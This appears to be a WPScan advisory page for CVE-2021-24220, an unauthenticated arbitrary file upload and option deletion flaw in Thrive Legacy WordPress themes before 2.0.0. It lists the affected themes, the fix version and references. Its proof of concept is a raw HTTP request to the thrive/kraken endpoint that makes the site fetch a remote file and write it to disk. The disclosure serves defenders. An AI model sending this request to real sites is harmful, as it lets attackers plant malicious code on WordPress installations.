WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

Themes Vulnerabilities

All Thrive Themes Legacy Themes < 2.0.0 - Unauthenticated Arbitrary File Upload and Option Deletion

Description

Thrive “Legacy” themes register a REST API endpoint to compress images using the Kraken image optimization engine. By supplying a crafted request in combination with data inserted using the Option Update vulnerability, it was possible to use this endpoint to retrieve malicious code from a remote URL and overwrite an existing file on the site with it or create a new file.This includes executable PHP files that contain malicious code.

Proof of Concept

POST /wp-json/thrive/kraken HTTP/1.1
Host: [URL]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 104

{"id":"td_optin_webhook","results":{"http:\/\/key":{"kraked_url":"https:\/\/ramgall.com\/license.txt"}}} 

Affects Themes

rise
Fixed in version 2.0.0
luxe
Fixed in version 2.0.0
minus
Fixed in version 2.0.0
ignition
Fixed in version 2.0.0
focusblog
Fixed in version 2.0.0
squared
Fixed in version 2.0.0
voice
Fixed in version 2.0.0
performag
Fixed in version 2.0.0
pressive
Fixed in version 2.0.0
storied
Fixed in version 2.0.0

References

CVE
CVE-2021-24220
URL
https://www.wordfence.com/blog/2021/03/recently-patched-vulnerability-in-thrive-themes-actively-exploited-in-the-wild

Classification

Type

UPLOAD

CWE
CWE-434

Miscellaneous

Original Researcher

Chloe Chamberland, Ram Gall, Charles Sweethill

Submitter

Chloe Chamberland, Ram Gall, Charles Sweethill

Submitter website
https://www.wordfence.com
Submitter twitter
wordfence
Verified

Yes

WPVDB ID
a2424354-2639-4f53-a24f-afc11f6c4cac

Timeline

Publicly Published

2021-03-24 (about 1 years ago)

Added

2021-03-24 (about 1 years ago)

Last Updated

2021-03-31 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceDisclosure policy
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us